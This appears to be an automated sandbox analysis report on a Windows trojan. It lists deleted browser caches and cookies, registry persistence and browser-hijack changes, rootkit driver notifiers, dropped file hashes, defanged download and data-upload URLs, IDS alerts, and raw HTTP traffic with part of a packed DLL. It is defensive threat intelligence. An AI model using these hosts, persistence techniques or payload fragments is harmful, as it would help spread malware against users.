C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4CWVLDFS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_search.uk[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Windows\PHTQYMp\QPofTRsG.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Windows\PHTQYMp\WVqSMf.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\VqEnvKPzCrM8a4pakUu0bzh7d9o[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A3D4372536C2A6CA26ECB4389B6AE73E3BED83A7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed\3412 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Windows\PHTQYMp\oBIxFFT.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\HGQPYGV7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KE9BMB37.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Yd__VnAFnBZBQiIS0sHoF6FGRC8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\0VR58838.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\fc07_2[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\14926D90946B0F4BA2FCA38D75A5FBA83EF29AD0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D3620E4C550741E4DDAEC4D0AB078C93B1727686 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\45B87FD3EF6A4D430DA29B1C188A4A5FAFC69C3C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\fc07[1].swf (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\03Z3OHNC.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4F47793AB96483D552603451EF223EFE9EFAB646 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5D44AC703C53CC7EE6356F698FD1B03DA81FFE47 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\CBA2520DD31049525B64F21BBF7476F4E2AC1945 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\59FYE1S2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\_CACHE_CLEAN_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000004 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000005 (0 bytes)
C:\Windows\CLOG.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000007 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000002 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000003 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\97A235A1B13145568E910503A58B8E76054337B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache\startupCache.4.little (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Tsv1TyvAx4g5KyOkiAdSP1Stniw[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\49BE32824E0BEC3A9A307F5D676B110AE86F1525 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G6NPTRAV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B7B9989DD0CA3B12797AAA0DED4830817A18AF46 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\CZKDRHGB.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\index (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C3357B699A03D6C47624A0BC4184ED6E2B8D6443 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B5C4975322F4602AB10B7CA78508940BDD035CA4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\nearest[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.sbstore (0 bytes)
C:\Windows\ovhlpnij.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KCULDY7L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0D043EB989F0FC6687A4FE1945189BE609121C27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KJGZP41Y.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000f (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C7BC478C975246AA379BD2F61AE321CCCC3810B9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6FD573E2D36B9D3C24362667556816AF31DA3541 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\84695AE0389FC766A8E02D06319A5484EC0EA303 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KUZ61ORW.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000013 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000012 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000011 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000010 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F8AC72083E334F70A553AE68455FBDF0E65C5221 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\53EACA4C6576AB60F419E74ED41F7A38AECF13D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2E78209F2BD7068695BB80AAE0D3E5F19A372BCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C489C169C7BEFDF8E1C92A8B42A536E07094BFB3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4A0EC69D76B2B80C39B49E6A9B3E7D14DFBD935B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\637008686606A1B97226747F72405A0455707B8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000d (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000e (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\19829C5A0B960EA3263403EFD05B9EB93E557CA3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\Z40SB5AS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000b (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_00000c (0 bytes)

Registry activity

The process adca3c78dafc4406e4d0862872e8236.exe:260 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"ImagePath" = "\DosDevices\C:\Windows\system32\1428b5\CDClient_EX.sys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"Devname" = "8Kx9nwShsniƢ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{E549E976-C5F2-4E77-819D-55BC9B7C25BC}"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"ShortcutBehavior" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION]
"adca3c78dafc4406e4d0862872e8236.exe" = "9000"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Enable Browser Extensions" = "no"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Local Page" = "https://www.hao774.com/?90166-00003"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"PopupsUseNewWindow" = "1"

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"Start" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "https://www.hao774.com/?90166-00003"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0C 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"ErrorControl" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\System\CurrentControlSet\services\8Kx9nwShsni]
"Type" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\adca3c78dafc4406e4d0862872e8236_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\TypedURLs]
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
cdfb49d4628f3822b2335c7a35bf69cd c:\Users\"%CurrentUserName%"\AppData\Roaming\hUOtTh\adca3c78dafc4406e4d0862872e8236.exe
89d67caa050c7cdcd0d25617570c5100 c:\Windows\PHTQYMp\LNYxeOwQr.dll
948d63bef2e72217291dca9952a08d84 c:\Windows\PHTQYMp\QPofTRsG.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\DosDevices\C:\Windows\system32\1428b5\82JCkTn3kmC.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "entry 1 from table of Process notifiers, error 59" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "\DosDevices\C:\Windows\system32\1428b5\82JCkTn3kmC.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "\DosDevices\C:\Windows\system32\1428b5\82JCkTn3kmC.sys" the Trojan controls operations with a system registry by installing the registry notifier.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
CODE 4096 1241088 997888 5.54504 e5ed7707c28615a52252d3ddbe66e1f9
.rsrc 1245184 12288 9728 4.44571 eed794cfda96ae8b48640339bb781167

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.58sky.com/index/getcfg?id=58999 119.97.143.58
hxxp://5636.ecoma.ourwebpic.com/d2/CDClient.dll
hxxp://5636.ecoma.ourwebpic.com/d2/x86.dll
hxxp://5636.ecoma.ourwebpic.com/
hxxp://1212.ip138.com/ic.asp 183.238.101.232
hxxp://www.ip.cn/
hxxp://ip.dnsexit.com/
hxxp://5636.ecoma.ourwebpic.com/d2/wblm.dll
hxxp://client.sndo.com/s.json?g=MTUwNDU5MjQ4MDQ3NzAwMO9UrQUPZeovcXd7lISxliFM*I2t9GMztLzd-4Ss2V4S3GgKOk*3LI4Oyjm-VUvqyyFwAK9z4Z4s1uy*4kWckxeiZwMqDefR6BZFaQ-h6dpY4cbddl2-6ecos02yEpW6g3XH1RakoVsIZKoU6dEw5M*EmOFPF8d4dIxESMPX7f9n7L7fioXfvnh*xr8IXI31xn4coZKX2PBJAHwp*YF-0TA-HDyeBaK35xay6L-eYOcu 182.140.215.83
hxxp://client.sndo.com/putdata?type=2 182.140.215.83
hxxp://www.ip138.com/ 87.245.198.83
hxxp://dld.jxwan.com/d2/wblm.dll 87.245.198.83
hxxp://dld.jxwan.com/d2/x86.dll 87.245.198.83
hxxp://i.sndo.com/putdata?type=2 182.140.215.83
hxxp://www.go890.com/d2/CDClient.dll 87.245.198.83
xxx.baidustatie.com 182.140.215.71


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY External IP Lookup - www.ip.cn
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

......................................................................
..........................................................

HTTP/1.1 400 Bad Request


Server: nginx/1.12.0
Date: Tue, 05 Sep 2017 03:21:20 GMT
Content-Type: text/html
Content-Length: 173
Connection: close
<html>..<head><title>400 Bad Request</title>&l
t;/head>..<body bgcolor="white">..<center><h1>400
 Bad Request</h1></center>..<hr><center>nginx/
1.12.0</center>..</body>..</html>....



HEAD /d2/x86.dll HTTP/1.1
Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 22:46:31 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
....


GET /d2/x86.dll HTTP/1.1


Host: dld.jxwan.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Mon, 04 Sep 2017 22:46:31 GMT
Server: kangle/2.9.6
Last-Modified: Mon, 26 Dec 2016 03:09:39 GMT
Content-Type: application/octet-stream
Content-Length: 126464
Age: 1
X-Via: 1.1 db77:3 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L....m`X...........!........
........P.....................................................@.......
..........................x...........x...................p...........
............................$...H.....................................
......UPX0....................................UPX1....................
............@....rsrc...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!.......RXh...o..O...."..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.......9........&..t..C<.D.x...3<...;.u.|.H.^.
..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>


GET /index/getcfg?id=58999 HTTP/1.1
Host: VVV.58sky.com
Accept: text/html, */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 
Server: nginx/1.8.1
Date: Tue, 05 Sep 2017 03:20:59 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Encoding: gzip
400a..............Y..H..._..x. .F-...Y.Y3..y.......EJ.(j%uE.P...c.1...
.....;M4.r.......r..../.f..../........_....l..(.......o__...L...r.]...
